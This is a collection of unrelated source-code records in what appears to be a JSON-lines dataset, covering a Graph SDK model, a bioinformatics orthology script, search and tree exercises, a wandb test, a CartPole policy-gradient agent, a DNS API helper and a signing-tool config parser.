setattr(self, 'conference_id', n.get_str_value()),\n \"joinUrl\": lambda n : setattr(self, 'join_url', n.get_str_value()),\n \"@odata.type\": lambda n : setattr(self, 'odata_type', n.get_str_value()),\n \"phones\": lambda n : setattr(self, 'phones', n.get_collection_of_object_values(Phone)),\n \"quickDial\": lambda n : setattr(self, 'quick_dial', n.get_str_value()),\n \"tollFreeNumbers\": lambda n : setattr(self, 'toll_free_numbers', n.get_collection_of_primitive_values(str)),\n \"tollNumber\": lambda n : setattr(self, 'toll_number', n.get_str_value()),\n }\n return fields\n \n def serialize(self,writer: SerializationWriter) -> None:\n \"\"\"\n Serializes information the current object\n param writer: Serialization writer to use to serialize this model\n Returns: None\n \"\"\"\n if not writer:\n raise TypeError(\"writer cannot be null.\")\n writer.write_str_value(\"conferenceId\", self.conference_id)\n writer.write_str_value(\"joinUrl\", self.join_url)\n writer.write_str_value(\"@odata.type\", self.odata_type)\n writer.write_collection_of_object_values(\"phones\", self.phones)\n writer.write_str_value(\"quickDial\", self.quick_dial)\n writer.write_collection_of_primitive_values(\"tollFreeNumbers\", self.toll_free_numbers)\n writer.write_str_value(\"tollNumber\", self.toll_number)\n writer.write_additional_data_value(self.additional_data)\n \n\n","repo_name":"microsoftgraph/msgraph-sdk-python","sub_path":"msgraph/generated/models/online_meeting_info.py","file_name":"online_meeting_info.py","file_ext":"py","file_size_in_byte":4008,"program_lang":"python","lang":"en","doc_type":"code","stars":186,"dataset":"github-code","pt":"37"} +{"seq_id":"34585675137","text":"#!/usr/bin/env 
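The generated SDK class above routes each wire-format field through a dict of setter callables. A dependency-free sketch of that deserializer-map pattern (MeetingInfo and the field subset here are illustrative, not the msgraph API itself):

from dataclasses import dataclass
from typing import Any, Callable, Dict, Optional

@dataclass
class MeetingInfo:
    conference_id: Optional[str] = None
    join_url: Optional[str] = None

def field_setters(obj: MeetingInfo) -> Dict[str, Callable[[Any], None]]:
    # one entry per wire-format field name, mirroring get_field_deserializers()
    return {
        "conferenceId": lambda v: setattr(obj, "conference_id", v),
        "joinUrl": lambda v: setattr(obj, "join_url", v),
    }

def deserialize(payload: Dict[str, Any]) -> MeetingInfo:
    info = MeetingInfo()
    setters = field_setters(info)
    for key, value in payload.items():
        if key in setters:  # unknown keys are simply skipped in this sketch
            setters[key](value)
    return info

print(deserialize({"conferenceId": "42", "joinUrl": "https://example.test/join"}))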
python\nimport pandas as pd\nimport sys\nfrom collections import defaultdict\n\n# PSEUDO CODE\n# transfer inter-species PPI interactions to orthologs of interacting species\n# for each PPI:\n# transfer to other host:\n# for each target host:\n# find ortholog(s) (same score hits)\n# for each ortholog:\n# calculate new score, add interaction\n# transfer to other parasite:\n# for each target parasite:\n# find ortholog(s) (same score hits)\n# for each ortholog:\n# calculate new score, add interaction\n# transfer to other host-parasite pairs:\n# for each parasite-host pair:\n# find ortholog(s) (same score hits)\n# for each ortholog in host:\n# for each ortholog in parasite:\n# calculate new score, add interaction\n\n\n\ndef orthology_transfer(parasite_host_pairs_path, transfer_pairs_path, evidence_path, parasite_host_pairs_split_path, simap_rbh_path, PRIOR):\n\n # transfer inter-species PPIs \n alpha = 0.2\n\n # dict and set of host_parasite_pairs for fast look up\n parasite_host_pairs = pd.read_csv(parasite_host_pairs_path, \n sep=\"\\t\", \n header=None, \n names=[\"parasite_taxid\", \"host_taxid\"], \n dtype={\"parasite_taxid\": str, \"host_taxid\":str})\n\n parasite_host_pairs_split = pd.read_csv(parasite_host_pairs_split_path, \n sep=\"\\t\", \n header=None, \n names=[\"parasite_taxid\", \"host_taxid\"], \n dtype={\"parasite_taxid\": str, \"host_taxid\":str})\n\n # dict of transfer_pairs\n transfer_pairs = pd.read_csv(transfer_pairs_path,\n sep=\"\\t\",\n header=None,\n names=[\"class\", \"taxid1\", \"taxid2\", \"level\"], \n dtype={\"taxid1\": str, \"taxid2\":str})\n\n # load the evidence \n evidence = pd.read_csv(evidence_path,\n sep=\"\\t\",\n header=None,\n names = [\"channel\", \"taxid1\", \"protein1\", \"taxid2\", \"protein2\", \"score\"],\n dtype={\"taxid1\": str, \"taxid2\":str})\n\n\n ############\n # identify for each host-parasite pair to which host-parasite pairs I can transfer (when transferring both host and parasite)\n\n # dictionary of parasites between which I can transfer\n pp_pairs_dict = defaultdict(list)\n for row in transfer_pairs.loc[transfer_pairs[\"class\"] == \"parasite\"].iterrows():\n pp_pairs_dict[row[1][\"taxid1\"]].append(row[1][\"taxid2\"])\n\n # list of host pairs between which I can transfer\n # this is the longest list so we want to do the final look up in here\n hh_pairs_set = {\n (row[1][\"taxid1\"], row[1][\"taxid2\"])\n for row in transfer_pairs.loc[transfer_pairs[\"class\"] == \"host\"].iterrows()\n }\n hh_pairs_dict = defaultdict(list)\n for row in transfer_pairs.loc[transfer_pairs[\"class\"] == \"host\"].iterrows():\n hh_pairs_dict[row[1][\"taxid1\"]].append(row[1][\"taxid2\"])\n\n\n # dictionary which parasites infect which hosts\n parasite_host_dict = defaultdict(list)\n for row in parasite_host_pairs.iterrows():\n parasite_host_dict[row[1][\"parasite_taxid\"]].append(row[1][\"host_taxid\"])\n\n host_parasite_dict = defaultdict(list)\n for row in parasite_host_pairs.iterrows():\n host_parasite_dict[row[1][\"host_taxid\"]].append(row[1][\"parasite_taxid\"])\n\n target_dict = {}\n for row in parasite_host_pairs.iterrows():\n target_hp = []\n parasite = row[1][\"parasite_taxid\"]\n host = row[1][\"host_taxid\"]\n\n target_ps = pp_pairs_dict[parasite]\n\n for target_p in target_ps:\n target_hs = parasite_host_dict[target_p]\n\n for target_h in target_hs:\n if (host, target_h) in hh_pairs_set:\n target_hp.append((target_h, target_p))\n\n if len(target_hp) != 0:\n target_dict[host +\"_\"+ parasite] = target_hp\n\n # only 559 host-parasite pairs that 
can have transfer via host and parasite\n\n transferred_ppis = []\n\n # iterate over host-parasite pairs\n for row in parasite_host_pairs_split.iterrows():\n parasite = row[1][\"parasite_taxid\"]\n host = row[1][\"host_taxid\"]\n\n print(host, parasite)\n\n # select evidence from host-parasite pair\n evidence_host_parasite = evidence.loc[(evidence[\"taxid1\"] == host) & (evidence[\"taxid2\"] == parasite)]\n\n if len(evidence_host_parasite) == 0:\n continue\n\n # get all hosts and parasite between which we will transfer\n # for transferring either parasite or host\n target_hosts = set(hh_pairs_dict[host]).intersection(set(parasite_host_dict[parasite]))\n target_parasites = set(pp_pairs_dict[parasite]).intersection(set(host_parasite_dict[host]))\n # for transferring on both sides\n target_hp = target_dict.get(host +\"_\"+ parasite, [])\n target_hs = []\n target_ps = []\n for target_hp_pair in target_hp:\n target_hs.append(target_hp_pair[0])\n target_ps.append(target_hp_pair[1])\n target_ps = set(target_ps)\n target_hs = set(target_hs)\n\n # load orthology data of relevant organisms in memory\n rbh_dict = dict()\n\n for target_host in target_hs.union(target_hosts):\n rbh = pd.read_csv(simap_rbh_path + \"/{}.{}_rbh.tsv\".format(host, target_host), sep=\"\\t\", header=None, names=[\"qseqid\", \"sseqid\", \"normbitscore\", \"percident\", \"percsim\", \"qstart\", \"qend\", \"sstart\", \"send\"])\n # protein IDs of evidence does not contain taxid\n rbh['qseqid'].replace({r\"^[0-9]+\\.\": ''}, inplace = True, regex = True)\n rbh['sseqid'].replace({r\"^[0-9]+\\.\": ''}, inplace = True, regex = True)\n\n rbh_dict[host + \"_\" + target_host] = defaultdict(list)\n for row in rbh.iterrows():\n # possibly multiple orthologs (same score)\n rbh_dict[host + \"_\" + target_host][row[1][\"qseqid\"]].append((row[1][\"sseqid\"], row[1][\"normbitscore\"]))\n\n for target_parasite in target_ps.union(target_parasites):\n rbh = pd.read_csv(simap_rbh_path + \"/{}.{}_rbh.tsv\".format(parasite, target_parasite), sep=\"\\t\", header=None, names=[\"qseqid\", \"sseqid\", \"normbitscore\", \"percident\", \"percsim\", \"qstart\", \"qend\", \"sstart\", \"send\"])\n # protein IDs of evidence does not contain taxid\n rbh['qseqid'].replace({r\"^[0-9]+\\.\": ''}, inplace = True, regex = True)\n rbh['sseqid'].replace({r\"^[0-9]+\\.\": ''}, inplace = True, regex = True)\n\n rbh_dict[parasite + \"_\" + target_parasite] = defaultdict(list)\n for row in rbh.iterrows():\n # possibly multiple orthologs (same score)\n rbh_dict[parasite + \"_\" + target_parasite][row[1][\"qseqid\"]].append((row[1][\"sseqid\"], row[1][\"normbitscore\"]))\n\n # change default return value\n for key in rbh_dict.keys():\n rbh_dict[key].default_factory = lambda:False\n\n # iterate over evidence from host-parasite pair\n for ppi in evidence_host_parasite.iterrows():\n ppi = ppi[1]\n host_prot, parasite_prot, score = (ppi[\"protein1\"], ppi[\"protein2\"], ppi[\"score\"])\n\n # one-way transfer\n for target_host in target_hosts:\n # check if protein has rbh in other host\n target_proteins = rbh_dict[host + \"_\" + target_host][host_prot]\n if target_proteins:\n for target_prot in target_proteins:\n new_score = (score - PRIOR) * (target_prot[1]) ** alpha + PRIOR\n transferred_ppis.append((target_host, target_prot[0], parasite, parasite_prot, new_score))\n\n for target_parasite in target_parasites:\n # potentially multiple rbh's (identical sequences)\n target_proteins = rbh_dict[parasite + \"_\" + target_parasite][parasite_prot]\n if target_proteins:\n for 
target_prot in target_proteins: \n new_score = (score - PRIOR) * (target_prot[1]) ** alpha + PRIOR\n transferred_ppis.append((host, host_prot, target_parasite, target_prot[0], new_score))\n\n for target_hp_pair in target_hp:\n target_proteins_host = rbh_dict[host + \"_\" + target_hp_pair[0]][host_prot]\n target_proteins_parasite = rbh_dict[parasite + \"_\" + target_hp_pair[1]][parasite_prot]\n if target_proteins_host and target_proteins_parasite:\n # iterate over rbh's in host and parasite\n for target_prot_host in target_proteins_host:\n for target_prot_parasite in target_proteins_parasite:\n new_score = (score - PRIOR) * (target_prot_host[1] * target_prot_parasite[1]) ** alpha + PRIOR\n transferred_ppis.append((target_hp_pair[0], target_prot_host[0], target_hp_pair[1], target_prot_parasite[0], new_score))\n\n transferred_ppis_df = pd.DataFrame(transferred_ppis, columns = [\"taxid1\", \"prot1\", \"taxid2\", \"prot2\", \"score\"])\n transferred_ppis_df[\"channel\"] = evidence[\"channel\"][0]\n transferred_ppis_df = transferred_ppis_df[[\"channel\", \"taxid1\", \"prot1\", \"taxid2\", \"prot2\", \"score\"]]\n\n return(transferred_ppis_df)\n\n\nif __name__ == \"__main__\":\n\n parasite_host_pairs_path = sys.argv[1]\n transfer_pairs_path = sys.argv[2]\n evidence_path = sys.argv[3]\n simap_rbh_path = sys.argv[4]\n parasite_host_pairs_split_path = sys.argv[5]\n PRIOR = float(sys.argv[6])\n output_file = sys.argv[7]\n\n transferred_ppis_df = orthology_transfer(parasite_host_pairs_path, transfer_pairs_path, evidence_path, parasite_host_pairs_split_path, simap_rbh_path, PRIOR)\n \n transferred_ppis_df.to_csv(output_file, sep=\"\\t\", compression=\"gzip\", index=False, header=False)\n","repo_name":"HenriettaHolze/parasite-string-pipeline","sub_path":"scripts/orthology_transfer_host_parasite_interactions_generalized.py","file_name":"orthology_transfer_host_parasite_interactions_generalized.py","file_ext":"py","file_size_in_byte":10238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"30692064224","text":"import random\nfrom sortingAlgorithms import mergeSort\n\nlinearComparisons = 0\nbinaryComparisons = 0\nindividualBinary = 0\nindividualLinear = 0\n\ndef linearSearch(A, target):\n global linearComparisons\n global individualLinear\n location = 0 # Location is the index of comparison\n while location < len(A): # Ensures we dont go out of array\n individualLinear +=1 # Updates counters\n linearComparisons +=1\n if A[location] == target: # Compares values to target\n flag = True\n break # Stop if we find the target\n else:\n flag = False\n location +=1 # Move onto next index\n return(flag)\n\n\n\ndef binarySearch(A,start,stop,target):\n global binaryComparisons # Gives method access to global var\n global individualBinary\n flag = False\n midpoint = int((start + stop)/2) # Sets midpoint to middle\n binaryComparisons += 1 # Updates counters\n individualBinary += 1\n if start > stop: # Makes sure we havent exhausted search\n flag = False\n elif (A[midpoint] == target): # Compares target\n flag = True\n location = midpoint\n elif (target < A[midpoint]): # Searches lower; propagate the recursive result\n flag = binarySearch(A,start, midpoint-1, target)\n else: # Searches upper; propagate the recursive result\n flag = binarySearch(A, midpoint+1,stop,target)\n\n return(flag)\n\n\ndef main():\n f = open('magicitems.txt',\"r\")\n magicitems = list(f)\n f.close() # close() must be called, not just referenced\n magicitems = [x.strip() for x in magicitems]\n magicitems = [x.lower() for x in magicitems]\n magicitems = [x.replace(' ','') for x in magicitems]\n\n a = 
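Every transfer branch in the orthology script above applies the same rescoring rule. A standalone sketch of that rule; the prior value passed below is an arbitrary example, since the pipeline reads PRIOR from the command line:

def transfer_score(score, normbitscores, prior, alpha=0.2):
    # shrink the above-prior part of the evidence by the orthologs'
    # normalized bitscores raised to alpha, then add the prior back
    penalty = 1.0
    for b in normbitscores:  # one factor per transferred side
        penalty *= b
    return (score - prior) * penalty ** alpha + prior

print(transfer_score(0.9, [0.8], prior=0.05))        # one-sided transfer
print(transfer_score(0.9, [0.8, 0.7], prior=0.05))   # host and parasite both transferred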
mergeSort(magicitems)\n\n\n\n timesToCheck = 42\n randomItems = []\n for i in range(timesToCheck):\n randomItems.append(random.choice(a))\n\n for i in randomItems:\n global individualLinear\n linearSearch(a,i)\n print(\"Comparisons Linear Search: \", individualLinear)\n individualLinear = 0\n\n \n for i in randomItems:\n global individualBinary\n binarySearch(a,0,len(a),i)\n\n print(\"Comparisons Binary Search: \", individualBinary)\n individualBinary = 0\n\n\n print(\"-----------------------------------------------\")\n print(\"Searching Algorithm | Comparisons \")\n print(\"---------------------|-------------------------\")\n print(\"Linear Search: \",\" | \", linearComparisons/timesToCheck)\n print(\"Bianry Search: \",\" | \", binaryComparisons/timesToCheck)\n\n\nmain()\n","repo_name":"NicholasMaisel/Algorithms","sub_path":"searchAlgorithms.py","file_name":"searchAlgorithms.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8395531331","text":"\"\"\"\ntime resolution full tests.\n\"\"\"\n\nimport time\n\nimport wandb\n\n\ndef test_resume(live_mock_server, test_settings, parse_ctx):\n live_mock_server.set_ctx({\"resume\": True})\n\n before = time.time()\n with wandb.init(settings=test_settings, resume=\"allow\") as run:\n for i in range(10):\n run.log(dict(k=i))\n time.sleep(0.000010) # 10 us\n after = time.time()\n\n ctx_util = parse_ctx(live_mock_server.get_ctx())\n history = ctx_util.history\n history_updates = ctx_util.get_filestream_file_updates()[\"wandb-history.jsonl\"]\n\n assert history_updates[0][\"offset\"] == 15\n assert len([h for h in history if h]) == 10\n assert [h for h in history if h][0][\"_step\"] == 16\n assert any([h[\"_timestamp\"] % 1 > 0 for h in history if h])\n assert any([h[\"_runtime\"] % 1 > 0 for h in history if h])\n assert all([before <= h[\"_timestamp\"] <= after for h in history if h])\n assert all([h[\"_runtime\"] >= 70 for h in history if h])\n","repo_name":"wandb/wandb","sub_path":"tests/pytest_tests/unit_tests_old/test_time_resolution.py","file_name":"test_time_resolution.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":7479,"dataset":"github-code","pt":"37"} +{"seq_id":"24329299691","text":"tree = [0 for x in range(10)]\n\ndef root(root):\n if tree[0] == 0:\n tree[0] = root\n else:\n print(\"Tree already had root\")\n\n return 0\n\ndef set_right(child, parent):\n if tree[parent]:\n tree[(2*parent)+2] = child\n return\n else:\n print(\"can't insert child {0} parent is not found\".format(parent))\n\ndef set_left(child, parent):\n if tree[parent]:\n tree[(2*parent)+1] = child\n return\n else:\n print(\"can't insert child {0} parent is not found\".format(parent))\n\n\ndef print_tree():\n for i in tree:\n print(i)\n\nif __name__==\"__main__\":\n root('A')\n set_left('B',0)\n set_right('C',0)\n set_right('E', 1)\n set_left('D', 1)\n set_right('F', 2)\n print_tree()\n","repo_name":"prasilla487/Python_excersizes_DSA","sub_path":"trees/array_bt.py","file_name":"array_bt.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35535866529","text":"import torch\nimport gym\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nimport torch.optim as optim\nimport math\nfrom torch.distributions import Categorical\nimport matplotlib.pyplot as plt\nfrom itertools import count\nenv = 
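For comparison with the recursive version fixed above, an iterative binary search avoids the result-propagation pitfall entirely and keeps its bounds inclusive, so callers never need to pass len(a) as a stop index:

def binary_search(items, target):
    low, high = 0, len(items) - 1  # inclusive bounds
    while low <= high:
        mid = (low + high) // 2
        if items[mid] == target:
            return True
        if target < items[mid]:
            high = mid - 1  # search lower half
        else:
            low = mid + 1   # search upper half
    return False

data = sorted(["amulet", "cloak", "ring", "wand"])
assert binary_search(data, "ring")
assert not binary_search(data, "sword")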
gym.make('CartPole-v1')\n\n\nclass PG_network(nn.Module):\n def __init__(self):\n super(PG_network, self).__init__()\n self.linear1 = nn.Linear(4, 128)\n self.dropout = nn.Dropout(p=0.6)\n self.linear2 = nn.Linear(128, 2)\n\n # self\n # self.optimizer = optim.Adam(self.parameters(),lr=1e-2)\n\n def forward(self, x):\n x = self.linear1(x)\n x = self.dropout(x) # reduce overfitting\n x = F.relu(x)\n action_scores = self.linear2(x)\n # x = self.dropout(x)\n # x = F.relu(x).unsqueeze(0)\n # x = x.unsqueeze(0)\n return F.softmax(action_scores, dim=1)\n # maxvalue,index = torch.max(x,dim=1)\n # y = x.squeeze(0)\n # action_random = np.random.choice(y.detach().numpy())\n # print(action_random)\n # return x\n\n\npolicyG_object = PG_network()\noptimizer = optim.Adam(policyG_object.parameters(), lr=1e-2)\npossibility_store = []\nr_store = []\n\n\ndef choose_action(s):\n s = torch.from_numpy(s).float().unsqueeze(0) #state\n probs = policyG_object(s)\n \"\"\"\n Categorical(probs) creates a categorical distribution parameterized by probs; samples are integers from 0 ... K-1, where K is the length of probs.\n That is, sampling draws a position according to the probabilities given in probs and returns the integer index of the sampled position.\n\n If probs is a 1-D list of length K, each element is the relative probability of sampling the class at that index.\n\n If probs is 2-D, it is treated as a batch of probability vectors.\n\n \"\"\"\n m = Categorical(probs)\n action = m.sample()\n b = m.log_prob(action)\n\n possibility_store.append(m.log_prob(action))\n return action.item()\n\n\nalpha = 0.9\ngammar = 0.9\nreward_delay = 0.9\n# np.finfo inspects the given dtype (here float64) and reports its properties; eps is the smallest representable positive float of that type.\neps = np.finfo(np.float64).eps.item()\n# R_store = []\n\n\ndef policy_gradient_learn():\n R = 0\n R_store = []\n delta_store = []\n # theta = -torch.log10()\n for r in r_store[::-1]:\n R = r + reward_delay*R\n R_store.insert(0, R)\n R_store = torch.tensor(R_store)\n R_store = (R_store - R_store.mean())/(R_store.std()+eps)\n\n # zip() takes iterables as arguments, pairs their corresponding elements into tuples, and returns an object made of those tuples, which saves a fair amount of memory.\n for p, v in zip(possibility_store, R_store):\n delta_store.append(-p*v)\n optimizer.zero_grad()\n\n delta_store = torch.cat(delta_store).sum() # cat: concatenate the sequence of tensors\n\n delta_store.backward()\n optimizer.step()\n del possibility_store[:] # del removes the variable binding, not the underlying data\n del r_store[:]\n # print(loss)\n\n\ndef main():\n running_reward = 10\n for i_episode in count(1):\n s, ep_reward = env.reset(), 0\n for t in range(1, 10000):\n # env.render()\n a = choose_action(s)\n s, r, done, info = env.step(a)\n r_store.append(r)\n ep_reward += r\n # print(r,a)\n if done:\n break\n\n running_reward = 0.05 * ep_reward + (1 - 0.05) * running_reward\n policy_gradient_learn()\n if i_episode % 10 == 0:\n print('Episode {}\\tLast reward: {:.2f}\\tAverage reward: {:.2f}'.format(\n i_episode, ep_reward, running_reward))\n if running_reward > env.spec.reward_threshold:\n print(\"Solved! 
Running reward is now {} and \"\n \"the last episode runs to {} time steps!\".format(running_reward, t))\n\n # torch.save(policy.state_dict(),'hello.pt')\nif __name__ == '__main__':\n main()\n","repo_name":"PtCu/RL","sub_path":"Policy-Gradients/CartPole.py","file_name":"CartPole.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33584860638","text":"import requests\nfrom libs.constants import ROOT_ZONE, HTTP\n\n\ndef call_api(path, method=HTTP.GET, data=None):\n url = f\"{ROOT_ZONE}/{path}\"\n if method == HTTP.GET:\n res = requests.get(url)\n if res.status_code != 200:\n raise Exception(f\"{method}: {path} returned {res.status_code}\")\n elif method == HTTP.POST:\n res = requests.post(url, data)\n elif method == HTTP.DELETE:\n res = requests.delete(url)\n elif method == HTTP.PUT:\n res = requests.put(url, data)\n else:\n raise Exception(f\"{method} is not supported\")\n return res\n","repo_name":"ehan1990/coredns-web","sub_path":"libs/cmd_helper.py","file_name":"cmd_helper.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15317234888","text":"import os\n\nimport defines as defines\n\nfrom sectools.common.utils import c_config, c_path\nfrom sectools.common.utils.c_logging import logger\nfrom sectools.common.utils.c_misc import get_dups_in_list\nfrom sectools.common.crypto.common_classes import HmacParams\n\n\nclass ConfigDir(object):\n \"\"\"Processes a given config directory to discover the available secimage\n config files in the directory.\n\n :param str config_dir: Path to the directory containing the config files.\n \"\"\"\n\n def __init__(self, config_dir):\n \"\"\"Initializations and checks\"\"\"\n if not c_path.validate_dir(config_dir):\n raise RuntimeError('Directory doesnt exist: ' + config_dir)\n\n # First level of directory that is expected\n sub_config_dir = c_path.join(config_dir, defines.CONFIG_DIR_BASENAME)\n try:\n c_path.validate_dir(sub_config_dir)\n except Exception as e:\n raise RuntimeError('Directory ' + config_dir + '\\n'\n ' ' + 'must contain configs sub directory: ' + defines.CONFIG_DIR_BASENAME)\n\n self.config_dir = sub_config_dir\n\n def _get_config_path(self, chipset_dir):\n \"\"\"Returns the config found in the chipset dir matching\n the naming conventions. 
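The core of policy_gradient_learn() in the REINFORCE record above is the backward pass over rewards. A minimal numpy sketch of that discounted-return computation, using the same 0.9 discount the script calls reward_delay:

import numpy as np

def discounted_returns(rewards, gamma=0.9):
    returns, running = [], 0.0
    for r in reversed(rewards):
        running = r + gamma * running  # R = r + gamma * R, walking backwards
        returns.insert(0, running)
    returns = np.asarray(returns)
    eps = np.finfo(np.float64).eps  # machine epsilon, guards against division by zero
    return (returns - returns.mean()) / (returns.std() + eps)

print(discounted_returns([1.0, 1.0, 1.0]))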
If the config file is not found\n in the dir, None is returned.\n\n :param str chipset_dir: The directory in which to look for config path.\n :returns: config_file\n :rtype: (str)\n \"\"\"\n config = None\n chipset_from_dir_name = os.path.basename(chipset_dir)\n\n for entry in os.listdir(chipset_dir):\n path = c_path.join(chipset_dir, entry)\n if c_path.validate_file(path) and entry.endswith(defines.XML_NAME_ENDING):\n # Extract the chipset from the file\n try:\n chipset_from_file = ConfigParser.get_chipset_from_file(path)\n except Exception as e:\n logger.warning('Skipping file: ' + entry + '\\n'\n ' ' + 'Failed to load the file: ' + str(e))\n continue\n\n # Check the naming conventions\n if chipset_from_file == chipset_from_dir_name:\n config = path\n else:\n logger.warning('Skipping file: ' + entry + '\\n'\n ' ' + 'Chipset from file: \"' + chipset_from_file + '\" does not match chipset from dir name: \"' + chipset_from_dir_name + '\"')\n else:\n logger.debug2('Skipping file: ' + entry + '\\n'\n ' ' + 'Name does not match any of the naming convention patters')\n logger.debug2('Config path found for chipset_dir: ' + chipset_dir + '\\n'\n ' ' + 'config: ' + str(config))\n return config\n\n @property\n def config_paths(self):\n \"\"\"(list[tuple(str)]) List of the config paths found in the workspace\n conforming to the naming structure.\n \"\"\"\n config_dir = self.config_dir\n config_paths = []\n\n logger.debug('Searching config path sets in dir: ' + config_dir)\n for entry in os.listdir(config_dir):\n path = c_path.join(config_dir, entry)\n if c_path.validate_dir(path):\n config = self._get_config_path(path)\n if config:\n config_paths.append(config)\n else:\n logger.debug2('Skipping dir: ' + entry + '\\n'\n ' ' + 'Does not contain any configs')\n else:\n logger.debug2('Skipping file in first level: ' + entry)\n logger.debug('Config paths found from the config dir: ' + str(config_paths))\n return config_paths\n\n @property\n def configs(self):\n \"\"\"(list[obj]) List of objects of :class:`ConfigParser` generated by\n loading the config files in the config_dir.\n \"\"\"\n configs = []\n for path in self.config_paths:\n logger.debug2('Loading config: ' + path)\n try:\n configs.append(ConfigParser(path))\n except Exception as e:\n logger.warning('Failed to load config: ' + path + '\\n'\n ' ' + 'Error: ' + str(e))\n return configs\n\n @property\n def chipsets(self):\n \"\"\"(list[str]) List of chipset names supported by the configs in the\n config dir.\n \"\"\"\n chipsets = []\n for config in self.configs:\n chipsets.append(config.chipset)\n logger.debug('Chipsets found from the configs: ' + str(chipsets))\n return chipsets\n\n @config_paths.setter\n def config_paths(self, value):\n raise RuntimeError('Config_Paths in a config dir cannot be set.')\n\n @configs.setter\n def configs(self, value):\n raise RuntimeError('Configs in a config dir cannot be set.')\n\n @chipsets.setter\n def chipsets(self, value):\n raise RuntimeError('Chipsets in a config dir cannot be set.')\n\n def get_chipset_dir(self, chipset):\n \"\"\"Returns the expected path within the config dir for the chipset\n\n :param str chipset: The chipset for which directory path is queried.\n \"\"\"\n return c_path.join(self.config_dir, chipset)\n\n def create_chipset_dir(self, chipset):\n \"\"\"Creates the directory in the config dir for the chipset\n\n :param str chipset: The chipset for which directory needs to be\n created\n :raises: RuntimeError - If directory creation fails\n \"\"\"\n try:\n 
c_path.create_dir(self.get_chipset_dir(chipset))\n except Exception as e:\n raise RuntimeError('Failed to create directory for chipset: ' + chipset + '\\n'\n ' ' + 'Error: ' + str(e))\n\n def get_chipset_config_path(self, chipset):\n \"\"\"\n :param str chipset: chipset to return config file for\n :returns: config path corresponding to the given chipset\n :rtype: str\n \"\"\"\n logger.debug('Searching configs corresponding to chipset: ' + chipset)\n chipset_dir = c_path.join(self.config_dir, chipset)\n\n if c_path.validate_dir(chipset_dir):\n return self._get_config_path(chipset_dir)\n raise RuntimeError('Did not find config for chipset: \"' + chipset + '\"')\n\n\nclass ConfigParser(c_config.CoreConfig):\n \"\"\"Parses the SecImage configuration file using c_config.CoreConfig and\n the module auto-generated using generateDS (auto_gen_xml_config).\n\n :param str config_path: Path to the config file to be parsed.\n\n .. data: root\n\n Root class representing the structure of the config file.\n\n .. data:: __version__ = 1.1\n\n Version of the Config Parser\n\n \"\"\"\n\n __version__ = '1.2'\n\n def __init__(self, config_path):\n \"\"\"Initializations and checks\"\"\"\n import auto_gen_xml_config, auto_gen_obj_config\n\n assert isinstance(config_path, str)\n self.config_module = auto_gen_xml_config\n self.obj_module = auto_gen_obj_config\n c_config.CoreConfig.__init__(self, self.config_module, config_path)\n self.validate()\n\n def validate(self):\n \"\"\"Normalizes and validates the data in the secimage xml.\n\n :raises: RuntimeError if config is determined to be invalid\n \"\"\"\n c_config.CoreConfig.validate(self, defines.CONFIG_STRUCTURE)\n\n # Validate root config rules\n from rule import ConfigRulesManager\n rules = ConfigRulesManager()\n rules.validate(self, defines.CONFIG_STRUCTURE)\n\n # Check that the version matches\n config_version = self.version\n if config_version != self.__version__:\n raise RuntimeError('Version of parser: \"' + self.__version__ + '\" does not match version from config \"' + config_version + '\"')\n\n # Check that atleast one image_type was provided\n image_type_id_list = [image_type.id for image_type in self._get_parsegen_image_type_list()]\n if len(image_type_id_list) == 0:\n raise RuntimeError('Config file must contain at least one image_type under parsegen->image_types_list')\n\n # Check that the ids of the image_type objects are unique\n dup_image_type_id_list = get_dups_in_list(image_type_id_list)\n if len(dup_image_type_id_list):\n raise RuntimeError('image_type ids must be unique. Found multiple image_types with same id: ' + str(dup_image_type_id_list))\n\n # Check that the ids of the cert_configs_list are unique\n cert_config_id_list = [cert_config.id for cert_config in self._get_signing_local_cert_config_list()]\n dup_cert_config_id_list = get_dups_in_list(cert_config_id_list)\n if len(dup_cert_config_id_list):\n raise RuntimeError('cert_config ids must be unique. Found multiple cert_configs with same id: ' + str(dup_cert_config_id_list))\n\n # Check that atleast one image was provided\n sign_id_list = self.sign_id_list\n if len(sign_id_list) == 0:\n raise RuntimeError('Config file must contain at least one image under the images_list')\n\n # Check that the ids of the image objects are unique\n dup_sign_id_list = get_dups_in_list(sign_id_list)\n if len(dup_sign_id_list):\n raise RuntimeError('image sign_ids must be unique. 
Found multiple images with the same sign_id: ' + str(dup_sign_id_list))\n\n def generate(self, file_path):\n \"\"\"Generates the secimage config file with the current configuration\n of the root node.\n\n :param str file_path: path to the config file that should be generated\n with the current data\n \"\"\"\n logger.note('Generating config file...')\n c_config.CoreConfig.generate(self, file_path,\n defines.XML_ROOTNODE,\n defines.XML_NAMESPACE,\n defines.XML_PREPEND_LINES)\n logger.note('Generated config file at: ' + str(file_path))\n\n def transfer_from_obj(self, obj):\n \"\"\"Updates the values of the config root node using the attributes of\n the object provided.\n\n :param Cfg_Secimage obj: Object to be used for obtaining the values.\n \"\"\"\n assert isinstance(obj, self.obj_module.Cfg_Secimage)\n logger.debug('Updating config contents using object: ' + obj)\n self.root = self.transfer_from_obj_to_node(obj,\n self.root,\n defines.CONFIG_STRUCTURE,\n defines.ROOTNODE_NAME)\n logger.debug('Config contents updated.')\n\n def transfer_to_obj(self, obj):\n \"\"\"Updates the attributes of the object provided using the values of the\n root config node.\n\n :params: same as :meth:`transfer_from_obj`\n \"\"\"\n assert isinstance(obj, self.obj_module.Cfg_Secimage)\n logger.debug('Updating object using config contents: ' + obj)\n obj = self.transfer_from_node_to_obj(self.root,\n obj,\n defines.CONFIG_STRUCTURE,\n defines.ROOTNODE_NAME,)\n logger.debug('Object updated using the config.')\n\n def transfer_from_obj_to_node(self, obj, node, structure, structure_parent):\n return self.transfer(obj,\n node,\n structure,\n structure_parent,\n self.config_module,\n 